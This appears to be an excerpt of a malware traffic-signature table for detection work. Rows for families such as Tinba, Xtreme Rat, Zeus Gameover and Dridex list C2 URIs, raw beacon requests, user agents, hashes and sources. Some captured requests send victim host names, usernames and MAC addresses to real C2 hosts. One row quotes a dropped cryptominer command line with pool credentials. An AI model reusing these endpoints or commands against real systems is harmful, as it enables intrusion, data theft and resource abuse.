265 | 2013-04-28 | CRIME | Tinba aka Zusy | POST | /h/index.php | /index.php | Host: dakotavolandos.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: identity Connection: close Content-Type: application/octet-stream Content-Length: 13 y0J.......ii.HTTP/1.1 200 OK -- see the link | Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 | c141be7ef8a49c2e8bda5e4a856386ac | http://contagiodump.blogspot.com/2012/06/amazon.html | http://bit.ly/crimepcaps | 2012-06 | |||||
266 | 2013-04-28 | APT | Vinself | POST | /w880/T19R17Q16/12010L11014 | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: zh-zh Content-Type: application/octet-stream Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1) Host: ftp.[removed].com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache GIF89aP. . .m.w. u. p. a.3.3.i.i6U:X0Q< | Mozilla/4.0 (compatible;MSIE 6.0; windows NT 5.1) | The URI path is randomly generated using system time - see the article | http://www.fireeye.com/blog/technical/malware-research/2010/11/winself-a-new-backdoor-in-town.html | 2010-11 | |||||||
267 | 2013-04-28 | CRIME | Vobfus | GET | /XEuPCLrf?e | /XEuPCLrf?e | /XEuPCLrf?e User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) Host: 82747.ddnsd.at | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) | s70F0B7BD55B91DE26F9ED6F1EF86B456 | http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html | 2012-11 | ||||||
268 | 2013-04-28 | APT | WEBC2-Bolid | GET | /firefox.html | /firefox.html | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: <hostname> Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | in response, the C2 server sends encoded commands between <head> and </head> HTML tags. The encoded commands are XORed with 0x42 and then Base64 encoded. | 5ff3269faca4a67d1a4c537154aaad4b | http://intelreport.mandiant.com/ | 2012:03:00 | |||||
269 | 2013-04-28 | APT | WEBC2-Clover | GET | /Default.asp | /Default.asp | Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Win32) Host: 209.161.249.125 Connection: Keep-Alive Cookie: PREF=86845632017245 | Mozilla/4.0 (compatible; MSIE 7.0; Win32) Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) When instructed to download a file, the malware will use the following User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.012 | The malware will periodically make HTTP requests with the following URIs: /Default.asp and /index.html | 2fccaa39533de02490b1c6395878dd79 | http://intelreport.mandiant.com/ | 2011:10:00 | |||||
270 | 2013-04-28 | APT | WEBC2-CSON | GET | /Default.aspx?INDEX=<10_random_characters> | /Default.aspx?INDEX= | User-Agent: Win32 Host: 66.129.222.1 Connection: Keep-Alive | <HOSTNAME> When instructed to download a file, the malware will use the following User-Agent: Windows+NT+5.1 | 50f35b7c86aede891a72fcb85f06b0b7 | http://intelreport.mandiant.com/ | 2011:09:00 | ||||||
271 | 2013-04-28 | APT | WEBC2-CSON Response to commands | POST | /Default.aspx?ID=IMNQRSSRXK | /Default.aspx?ID= | Accept: text/ Content-Type: application/x-www-form-urlencoded User-Agent: Win32 Host: 70.62.232.98 Content-Length: 16 Cache-Control: no-cache pn9OrT8wrT9Apn8= | Win32 <HOSTNAME> When instructed to download a file, the malware will use the following User-Agent: Windows+NT+5.1 | Responses to commands (except "d") use POSTs to "/Default.aspx?ID=<10_random_uppercase>" | 50f35b7c86aede891a72fcb85f06b0b7 | http://intelreport.mandiant.com/ | 2011:09:00 | |||||
272 | 2013-04-28 | APT | WEBC2-HEAD | GET | / | / | / User-Agent: WinHTTP 1.0 Host: www.olmusic100.com Content-Length: 28 Connection: Keep-Alive Y29ubmVjdCBURVNUTUFDSElORQ== | WinHTTP 1.0 | WEBC2-HEAD first issues an HTTP request to the host, sending the Base64-encoded string of “connect <HostName>”, where <HostName> is the name of the compromised machine running the malware. A sample decrypted request is shown in Figure 40, where the HTTP body is the Base64 encoded string “connect TESTMACHINE” (all over SSL 443) | 649d54bc9eef5a60a4b9d8b889fee139 | http://intelreport.mandiant.com/ | 2010:02:00 | |||||
273 | 2013-04-28 | APT | WEBC2-Table | GET | /order.htm | /order.htm | User-Agent: <current_time>+<hostname> Host: meeting.toh.info Connection: Keep-Alive Cache-Control: no-cache The malware uses the following User-Agent string: <current_time>+<hostname> | <current_time>+<hostname> | 7a7a46e8fbc25a624d58e897dee04ffa | http://intelreport.mandiant.com/ | 2012:03:00 | ||||||
274 | 2013-04-28 | CRIME | Xpaj | POST | /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh | /DxODlv? | Host: nortiniolosto.com Content-Length: 1279 Accept-Encoding: deflate Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Pragma: no-cache Cache-Control: no-cache nortiniolosto.com | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | D5C12FCFEEBBE63F74026601CD7F39B2 | http://contagiodump.blogspot.com/2012/05/mbr-rootkit-xpaj-sample.html | http://bit.ly/crimepcaps | 2012-05 | |||||
275 | 2013-04-28 | APT | Xtreme Rat | GET | /1234567890.functions | .functions | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: shittway.zapto.org:336 Connection: Keep-Alive Cache-Control: no-cache S.T.A.R.T.S.E.R.V.E.R.B.U.F.F.E.R..fm.......A.(.d,_.. .,T..N...............q> | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; . NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 336 | DAEBFDED736903D234214ED4821EAF99 | http://bit.ly/aptpcaps | 2013-04 | |||||
276 | 2013-04-28 | APT | Xtreme Rat | GET | /1234567890.functions | .functions | Accept:/Accept-Encoding:gzip,deflate User-Agent:Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/4.0;.NETCLR1.1.4322;.NETCLR2.0.50727;.NETCLR3.0.4506.2152;.NETCLR3.5.30729;.NET4.0C) Host:172.16.1.1:4000 Connection:Keep-Alive | Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;Trident/4.0;.NETCLR1.1.4322;.NETCLR2.0.50727;.NETCLR3.0.4506.2152;.NETCLR3.5.30729;.NET4.0C) | 4000 | http://bit.ly/aptpcaps | 2012 | ||||||
277 | 2013-04-28 | CRIME | Zeus Gameover | GET | /search.php?page=73a07bcb51f4be71 | /search.php?page= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) Host: telecrop.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1) | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2012-02 | ||||||
278 | 2012-08-08 | CRIME | BitcoinMiner | POST | {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} | {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} {"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f80e8a14", 4]} {"params": [63], "id": null, "method": "mining.set_difficulty"} {"params": ["8de", "72216db0a2e9151d8b8172470729848cbeecf1080cb8f37f65d047efb2c749f3", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2303122606062f503253482f04a5c4035208", "092f7374726174756d2f000000000100fb422a010000001976a9143c5adb00f1457309f084675941f114b8c09b6af188ac00000000", ["fc25ce83ea8ce3200ed2f56e7cf1ec43a8837118ddd965759c8fbe4d12a04f82", "ee78512684f4bb06bcbed1aa01703e10bbb733dc16cccaf387df0b18f656f234"], "00000001", "1b4e2a39", "5203c4a4", true], "id": null, "method": "mining.notify"} {"id": 2, "method": "mining.authorize", "params": ["hitmanuk.4", "123"]} | none in request but file strings: User-Agent: suckergo/2.3.2 | 9000 | downloaded by Bitblazer. Part of a tool package including bat file with "system.exe --algo scrypt --s 6 --threads 4 --url stratum+tcp://mine.pool-x.eu:9000 --userpass hitmanuk.4:123 P | e2c655db1ccd3a632ded94eacb933643 = part of f865c199024105a2ffdf5fa98f391d74 dropper - downloaded by Blazebot DBAF6F1D0EAAB5DC0C88B9CEEC9EA95E | http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/bitcoinminer-strings-CRIME.html | 8/8/2012 | ||
279 | 2012-08-08 | CRIME | Blazebot | IRC | <p>NICK USA|94576 <p>USER vtptdwd 0 0 :USA|94576 | NICK USA|94576 USER vtptdwd 0 0 :USA|94576 :DIE.Blazed-IRC.com NOTICE AUTH :*** Looking up your hostname... :DIE.Blazed-IRC.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead :DIE.Blazed-IRC.com NOTICE USA|94576 :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5FC26DC1 or /raw pong 5FC26DC1 now. PING :5FC26DC1 PONG :5FC26DC1 JOIN #fkyou# stay0ut :DIE.Blazed-IRC.com 001 USA|94576 :Welcome to the Blazed-IRC IRC Network USA|94576!vtptdwd@[victimIp] | 6667 | IRC | http://lavasoft.com/mylavasoft/malware-descriptions/blog/blazebot | http://bit.ly/crimesamples | 8/8/2012 | ||||||
280 | 2015-01-22 | CRIME | Nurjax Adware | GET | /services/rules.txt?dummy=916 | /rules.txt?dummy= | 80 | http://www.symantec.com/security_response/writeup.jsp?docid=2014-121000-1027-99&tabid=2 | |||||||||
281 | 2015-01-22 | CRIME | Tosct | GET | Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tDnEsVEiZEgOaQwpn1RARQDujk5Hr9SUuFwP4oIvv2mp7HEF1VTXRemWB5MkE8mxcxRmV | Y3vaR7-V0Vj6gdni | 8000 | BDD2AD4C0E1E5667D117810AE9E36C4B | http://www.threatexpert.com/report.aspx?md5=bdd2ad4c0e1e5667d117810ae9e36c4b <p> http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor:Win32/Tosct.A#tab=2 | ||||||||
282 | 2015-01-22 | CRIME | Nocpos | GET <p> POST | <p>/check/echo <p>/check | /check | POST /check HTTP/1.1 User-Agent: something Content-Type: application/x-www-form-urlencoded Host: support.wordpress-dark.com Content-Length: 35 Cache-Control: no-cache Cookie: __cfduid=dbfbc3842507971794fa2b7ca3316563e1418788175 address=08-00-27-68-68-B9&dt1=&dt2= | something | 80 | http://virustotal.com/en/file/09ca7be86f517f2e3238e1d52115d29fb2dd079a4d9fc60c18ddc823c137a940/analysis/ | |||||||
283 | 2015-01-22 | CRIME | OnionDuke | GET | <p>/forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= <p>s/sysinfo_7.php <p>/forum/phpBB3/prx_26.php | /phpBB3/ <p> /sysinfo_7.php | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rombeast.site50.net Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 80 | 28f96a57fa5ff663926e9bad51a1d0cb | https://www.f-secure.com/v-descs/backdoor_w32_onionduke.shtml | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | ||||
284 | 2015-01-22 | APT | Lagulon (Operation Cleaver) | POST | <P>/contador/server.php <P>/i/server.php <P>/includes/server.php | /server.php | POST /contador/server.php HTTP/1.1 Content-Disposition: inline; comp=<PC-NAME>; account=<USERNAME>; product=3; User-Agent: Mozilla/5.0 Host: halon.com.br Content-Length: 0 Cache-Control: no-cache | Mozilla/5.0 | 80 | https://www.virustotal.com/en/file/e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53/analysis/ <p> http://telussecuritylabs.com/threats/show/TSL20141210-04 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | |||||
285 | 2015-01-22 | APT? | Medusa | POST | <p>%s/bbc_mirror/%s/search?id=%s <p>/CNN_Mirror/EN/%s/search?id=%s <p>|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00 | _mirror/%s/search?id= | f8f74f17af1e3069bf780824ba26b33f <p> 3c0a2d353461c32a5f34e931e9aba71d | http://totalhash.com/analysis/820ea0a145f7c9ee7fa99176c5d59d5f20ada310 | http://bit.ly/aptsamples | ||||||||
286 | 2015-01-22 | CRIME | Toopu | GET | <p>/toopu.png <p>/%s:1048%s <p>/num3.html <p>/web/get_ad3.asp?type=loadall&machinename= <MACHINE_NAME>-6C78A9C3&cr=yes <p>/num3_51la.asp | /toopu.png | GET /toopu.png HTTP/1.1 Accept: */* Referer: Accept-Language: zh-cn UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) Host: 174.128.244.58 Connection: Keep-Alive Cookie: | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215) | 808 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||||
287 | 2015-01-22 | CRIME | Twerkin | GET | <p>/classes/functions.php?functionname=online <p>/classes/functions.php?functionname=getupdates <p>/classes/functions.php?functionname=getcommand | /classes/functions.php?functionname= | Host: nettwerk.x10.mx Connection: Keep-Alive | 80 | a27721f3b9566601030daab58c092c14 | http://telussecuritylabs.com/threats/show/TSL20141231-03 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | |||||
288 | 2015-01-22 | CRIME | TzeeBot / TinyZBot | POST | /checkupdate.asmx | /checkupdate.asmx | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433) Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetServerTime" Host: 95.211.241.249 Content-Length: 291 Expect: 100-continue Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433) | 96e372dea573714d34e394550059b1d7 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||||
289 | 2015-01-23 | CRIME | XLS URLDownloadToFileA function for Dridex | GET | /koh/mui.php | /mui.php | 8080 | hxxp://95.163.121.82:8080/koh/mui.php, C:\DOCUME~1\admin\LOCALS~1\Temp\GYHjksdf.exe Tax Payment Issue Email | 34fa02bb258c93cdf17cb49f25bc0866 | ||||||||
290 | 2015-01-23 | CRIME | Quervar / Induc.C / Dorifel | GET | <p>/js/way.php?00021708&pin=7DF38AD66C78A9C3 <p>/404/way.php?00038F50&pin=7DF38AD66C78A9C3 <p>/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3 <p>/1.php?JXU9WXFG&pin=DEC09603F4CEFD80 | &pin= | GET /1.php?JXU9WXFG&pin=DEC09603F4CEFD80 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MASP) Host: greatnewidea1.ru Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | 52466 | File infector | 2b62b641bcb2aebef64632cbf0dd37cf | http://www.welivesecurity.com/2012/08/21/quervar-induc-c-reincarnate/ <p> http://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/115/the-significance-of-quervar <p> https://www.virustotal.com/en/file/98370c3710c7c4fc8a50b0804c00a9a27d5f93e166a4aa739073febdf894a879/analysis/ | |||||
291 | 2015-01-23 | CRIME | Feidowns downloader / Kilim (?) / Cracktools | GET | <p>yeniadmin.php?os=WindowsXP <p>/yeniadmin.php?os=Windows7&osbit=64&antiv <p>/yeniadmin.php?os=Windows7&osbit=64&antiv=Nonti&kart=KotuKart&core=2&mhz=HIZLI http://whos.amung.us/pingjs/?k=yenikazi | .php?os= <p>&kart=KotuKart&core | GET /yeniadmin.php?os=WindowsXP&osbit=32&antiv=Nonti&kart=KotuKart&core=1&mhz=HIZLI HTTP/1.1 User-Agent: Access Host: feidowns.com | Access | 80 | https://www.virustotal.com/en/domain/feidowns.org/information/ | 2b62b641bcb2aebef64632cbf0dd37cf | ||||||
292 | 2015-01-23 | CRIME | GameVance Adware | GET | /aj/updtah.php | /updtah.php | 80 | 1e78fe18d2e2077ae991a9e4e93d2a7c | https://malwr.com/analysis/N2MzNzdhODJhZWIxNGRmNTk5ZmUwMTUzZWE0OWI1Mjc/ | ||||||||
293 | 2015-01-23 | CRIME | OpenShopper Adware | GET | <p>//mmsv/Access3.php <p>//opendb/mmsv.php <p>//mmsv/Access2.php <p>/opapp/postmedia1/Update.dat <p>/opapp/postmedia1/OKUpdate.exe | mmsv <p> opapp | 80 | 38F2EFA2D40FF3ACF0C57CB4B59A250E | http://www.threatexpert.com/report.aspx?md5=38f2efa2d40ff3acf0c57cb4b59a250e | ||||||||
294 | 2015-01-23 | CRIME | SoftPulse Adware | GET | /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_IaUehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJEkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJtiH8n4I81acQHcoYVRgaYP43_wbgv6_2Vf3NfFqPD7vqcR-i0sYMo4Qppk0aw?sbb=%5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cca6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27www.r7wti7bwji.com%27%5D&sbb_check=%5B%271%27%5D&fileName=%5B%27Setup%27%5D | 80 | c04017a08f3e4cebd9b7b20308ee8257 | ||||||||||
295 | 2015-01-23 | CRIME | FakeAV | GET | <p>/[...]/load.php?file=uploader <p>/[...]/load.php?file=grabbers <p>/[…]/load.php?file=1 <p>/ohwgx3kiTh/document.doc <p>/ohwgx3kiTh/load.php?file=0 | load.php?file= | 80 | https://www.f-secure.com/v-descs/trojan-downloader_w32_kdv176347.shtml | |||||||||
296 | 2015-01-23 | CRIME | Wauchos (download by Zbot of Cridex) | POST | <p>/ssdc32716372/file.php <p>/auto*.it/*/jeve.exe <p>//dd*.ru/old.exe | /ssdc32716372/file.php | POST /ssdc32716372/file.php HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022 Host: 188.225.72.229 Content-Length: 128 Connection: Keep-Alive Cache-Control: no-cache .(c...<..T3..DE._..p.[..f12...j.P.....i...G.,(....Y5y...........s..,..,u...n0...].S.....n._X$...E.3Y.Z8.....hY.xJ..*..WN.FNE.V. | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022 | 80 | 0d8d7a8074ee36a626d086f02490aaab | https://www.f-secure.com/weblog/archives/00002759.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||
297 | 2015-01-23 | CRIME | Blackenergy DDoS Bot | POST | <p>id=[bot_id]&bid=[base64_encoded_build_id]&dv=[x]&mv=[y]&dpv=[z] <p>id=[bot_id_sha1]&bid=[base64_encoded_build_id]&nm=[x]&cn=[y]&num=[z] The only major difference is that the id field contains just the hash instead of the actual string | https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf | https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf | http://bit.ly/crimesamples | |||||||||
298 | 2015-01-28 | CRIME | Alurewo / Alureon pay per click | GET | /click.php?c=f39daf0d969abd8fe186a9656341ed05a43d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7f11fa545f5e2926f54123019882b9a3fc4a6a6b711ae23b8587d1f45d7324667bb5f3e447f05b43c5 | /click.php?c= | GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a43d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7f11fa545f5e2926f54123019882b9a3fc4a6a6b711ae23b8587d1f45d7324667bb5f3e447f05b43c5 HTTP/1.1 Accept: */* Referer: http://retravopoytem.com/search.php Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 184.164.143.90 Connection: Keep-Alive | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57) | 80 | http://www.malware-traffic-analysis.net/2014/06/24/index2.html | |||||||
299 | 2015-01-29 | CRIME | OSX Wirelurker | GET | mac/getversion.php?sn=<SN> | /getversion.php?sn= | GET /mac/getversion.php?sn=C02N9LBSG083 HTTP/1.1 Host: www.comeinbaby.com Accept-Language: zh-Hans, en, en-us User-Agent: globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64) Connection: keep-alive | globalupdate (unknown version) CFNetwork/720.2.4 Darwin/14.1.0 (x86_64) | 80 | www.virustotal.com/en/file/93856f704db2efe2e2262e6c710a23d03d6b0748c02e4d5d8d2d4e25f56a8b32/analysis/ | http://bit.ly/crimesamples | ||||||
300 | 2015-01-29 | CRIME | Systweak Adware - Systweak RegClean Pro & Advanced System Protector | GET | /getipaddress.asp | /getipaddress.asp | GET /getipaddress.asp HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: www.k9pcfixer.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) | 80 | 0ae593e18649d696ed578e792b75558d | https://www.virustotal.com/en/file/82fc51cbdee9cf104af95a94415ff48190f55dc9ddf2de003753cbac099d392c/analysis/ | ||||||
301 | 2015-01-29 | CRIME | MPlug / Multiplug Adware | GET | /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&installer_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_file_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctorow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijot2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctorow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&IX_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout_id=8&project_name=TusFiles&uuid=%252A | /?step_id=1&sf=1& | GET /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&installer_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_file_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctorow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijot2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctorow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&IX_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout_id=8&project_name=TusFiles&uuid=%252A HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 Host: c1.diriginal.org Cache-Control: no-cache | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7 | 80 | 2ea0bcb1ca764a01571a09208e892199 | https://www.virustotal.com/en/file/d0a87d7b635d2313c1b4011e38c70e3c080bdf08be4d7a36344119d2c6e84ee6/analysis/ | ||||||
302 | 2015-01-29 | CRIME | Nemucod JS | GET | /document.php?id=5451565E011705000B120124031309050D084A0313114A010011&rnd=2129391 | /document.php?id= | GET /document.php?id=5451565E011705000B120124031309050D084A0313114A010011&rnd=2129391 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 64.239.7.212 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 80 | e77334c5995614fc79f285abca8e14ad | https://www.virustotal.com/en/file/6ead063f36bf906ff05055db42c9d7c6acc7d9729179286d8c9b30d52e815def/analysis/1422638297/ | http://bit.ly/crimesamples | |||||
303 | 2015-01-29 | CRIME | Andromeda / Wauchos | POST | /and/gate.php | /gate.php | POST /and/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/4.0 Host: ddnsse3ravis221.com.ua Content-Length: 70 Cache-Control: no-cache Pragma: no-cache BluO7awLMtZaAIV/b4XorzWUEUS000s6jUz7rTt5FY0uIjIc2nZdut5ZShu4vUIz us4= | Mozilla/4.0 | 80 | 607a24ccf8a82796384ae113f29e6ab5 | https://www.virustotal.com/en/file/11f6c17e317e02b71888133656029a322da6ada5f9f11cdfd90127aca0ff6a2a/analysis/ | http://bit.ly/crimesamples | |||||
304 | 2015-01-29 | CRIME | Poweliks click-fraud | GET | /click?sid=8f75f821c687855c53899112090ed27514c749fdcid=0 | /click?sid= | 80 | http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528 | |||||||||
305 | 2015-01-29 | CRIME | Poweliks click-fraud | GET | /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1c105d8c9 | /click.php?c= | 80 | http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malicious-url/6528 | |||||||||
306 | 2015-02-01 | CRIME | Yoddos / Darkshell / YoYoDDoS | 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........ | uqz.u... ........ | 60249 | old | ace89709b1ca5db8462d238712ab2ee7 | http://www.arbornetworks.com/images/documents/White%20Papers%20and%20Research/WP_ASERT_EN.pdf | http://bit.ly/crimesamples | |||||||
307 | 2015-02-01 | APT | Cobra / Turla | POST | /%s/%s?uid=%d&context=%s&mode=text&data=%s | 554450c1ecb925693fedbb9e56702646 | |||||||||||
308 | 2015-02-01 | APT | Panda | POST | /forum/login.cgi | /login.cgi | |||||||||||
